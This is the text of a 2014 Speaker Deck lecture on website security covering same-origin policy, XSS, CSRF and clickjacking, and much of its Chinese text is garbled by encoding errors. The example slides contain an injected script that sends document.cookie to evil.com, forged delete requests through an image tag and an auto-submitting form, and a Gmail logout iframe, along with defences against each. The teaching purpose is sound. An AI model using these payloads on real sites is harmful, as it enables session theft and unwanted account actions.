Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Selected Topics on Website Security @ 102-2 CCSP
Search
Johnson Liang
May 29, 2014
Technology
1
450
Selected Topics on Website Security @ 102-2 CCSP
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
Johnson Liang
May 29, 2014
Tweet
Share
More Decks by Johnson Liang
See All by Johnson Liang
Political Promise Tracker 政治承諾追蹤網 g0v-hackath14n 提案
mrorz
0
200
群眾協作的一些事—— 「自經區正反意見比較表」到 「臺北市長選舉承諾一覽表」到 「PPT 政治承諾追蹤網」
mrorz
0
410
Political Promise Tracker 政治承諾追蹤網 g0v-hackath12n 提案
mrorz
0
800
[Thesis Defense] SeeSS: Instant Change Impact Visualization for CSS developers
mrorz
0
260
g0v-hackath10n 提案 -- 2014 台北市長政見比較表
mrorz
0
250
網路及平台服務程式設計及零時政府 @ 創新網路技術推廣說明會
mrorz
0
160
g0v-hackath9n 提案 -- 自經區正反意見比較表
mrorz
0
120
CCSP 2014 期末成果展行前須知
mrorz
0
390
Google Analytics @ 102-2 CCSP
mrorz
0
320
Other Decks in Technology
See All in Technology
開発と脆弱性と脆弱性診断についての話
su3158
1
1.1k
自社製CMSからmicroCMSへのリプレースがプロダクトグロースを加速させた話
nextbeatdev
0
130
AIが住民向けコンシェルジュに?Amazon Connectと生成AIで実現する自治体AIエージェント!
yuyeah
0
260
ドキュメントはAIの味方!スタートアップのアジャイルを加速するADR
kawauso
3
340
Preferred Networks (PFN) とLLM Post-Training チームの紹介 / 第4回 関東Kaggler会 スポンサーセッション
pfn
PRO
1
180
OpenAPIから画面生成に挑戦した話
koinunopochi
0
150
AIドリブンのソフトウェア開発 - うまいやり方とまずいやり方
okdt
PRO
9
570
夢の印税生活 / Life on Royalties
tmtms
0
280
マイクロモビリティシェアサービスを支える プラットフォームアーキテクチャ
grimoh
1
200
ABEMAにおける 生成AI活用の現在地 / The Current Status of Generative AI at ABEMA
dekatotoro
0
650
Goss: New Production-Ready Go Binding for Faiss #coefl_go_jp
bengo4com
0
1.1k
見てわかるテスト駆動開発
recruitengineers
PRO
4
280
Featured
See All Featured
VelocityConf: Rendering Performance Case Studies
addyosmani
332
24k
Art, The Web, and Tiny UX
lynnandtonic
302
21k
What’s in a name? Adding method to the madness
productmarketing
PRO
23
3.6k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
Optimising Largest Contentful Paint
csswizardry
37
3.4k
Speed Design
sergeychernyshev
32
1.1k
Java REST API Framework Comparison - PWX 2021
mraible
33
8.8k
Measuring & Analyzing Core Web Vitals
bluesmoon
9
570
Building a Modern Day E-commerce SEO Strategy
aleyda
43
7.5k
Git: the NoSQL Database
bkeepers
PRO
431
65k
Designing for Performance
lara
610
69k
Music & Morning Musume
bryan
46
6.7k
Transcript
Selected Topics on Website Security Concept of Same Origin Policy,
XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
খࢿ҆શલি Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
Same-Origin Policy ಉݯࡦ
ᖣ᧸ث࠷֩৺࠷جຊత҆શޭೳʜʜ 8FCੋݐߏࡏಉݯࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
㑌ݸᖣ᧸ث။ɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
एᔒ༗ಉݯࡦɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯࡦɿ
https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin
༬ઃڋ㘺ލҬ፤ࢿྉ Լྻҝಛྫ
ಛྫҰɿՄލҬࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •
Javascript 無從讀寫其內容
ಛྫೋɿ$SPTT0SJHJO 3FTPVSDF4IBSJOH $034 • Origin request header • Access-Control-Allow-XXX response
header • Enabling cross-origin ajax, web font, WebGL & canvas
Cross-Site Scripting (XSS)
ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ༻ऀᖣ᧸ท࣌ɼ߇ ੍༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞
<section class="intro"> <%- user.desc %> </section> Your site : Example
#1 ༻ऀ ༌ೖత)5.-
<section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :
Example #1
<section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>
</section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖
<script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your
site : Example #2 ༻ऀࣗ༝༌ೖతࣈ۲
<script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your
site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
Ṝछ߈㐝తࣔൣҊྫੋލҬతɼॴҎڣ z$SPTTz 4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލҬቮៃෆ ࠶ॏཁɼ944Ṝݸ໊ࣈჟҰอཹྃԼိɻ – 吳翰清 ❝ ❞
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=
user.desc %> </section>
ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer
= require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແత)5.-UBHT
ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page
= <%- JSON.stringify({ title: userPage.title }) %>; </script>
ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize
想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
Cross-Site Request Forgery (CSRF/XSRF)
Your site : Example #4 // Delete current user account
app.get('/user/delete', userCtrl.delete);
evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑFWJMTJUFతਓɼ౸ྃ વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ
߈㐝ऀᷮᷮ༠ಋ༻ऀ๚ྃҰݸท໘ɼबҎ֘ ༻ऀతɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِతɼॴҎ ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ – 吳翰清 ❝ ❞
<iframe src="https://mail.google.com/mail/u/0/?logout"> Demo:cryptogasm.com/gmail-logout.html
evil.com : Example #5 ፨๚FWJMTJUFޙɼ༻ऀࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>
! <script type="text/javascript"> $('#evil-form').submit(); </script>
ڔํࣜ • CSRF 攻擊成功的要素:request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token:使攻擊者無法拼湊正確 request。
ڔํࣜ
ڔํࣜ
ڔํࣜ දᄸૹग़ޙɼޙDPOUSPMMFS။ᒾ查දᄸత UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ एෆҰᒬɼबෆ၏ࣄɻ
ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());
app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫೳ፤ಘ౸
Clickjacking
Jeremiah Grossman and Robert Hansen, 2008
http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use
None
ڔํࣜ w ᩋ㟬తෆඃ࠹ਐJGSBNFཫ • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be
your site!
http://youtu.be/VRCUpXLguHM 吳翰清 著
http://youtu.be/VRCUpXLguHM 吳翰清 著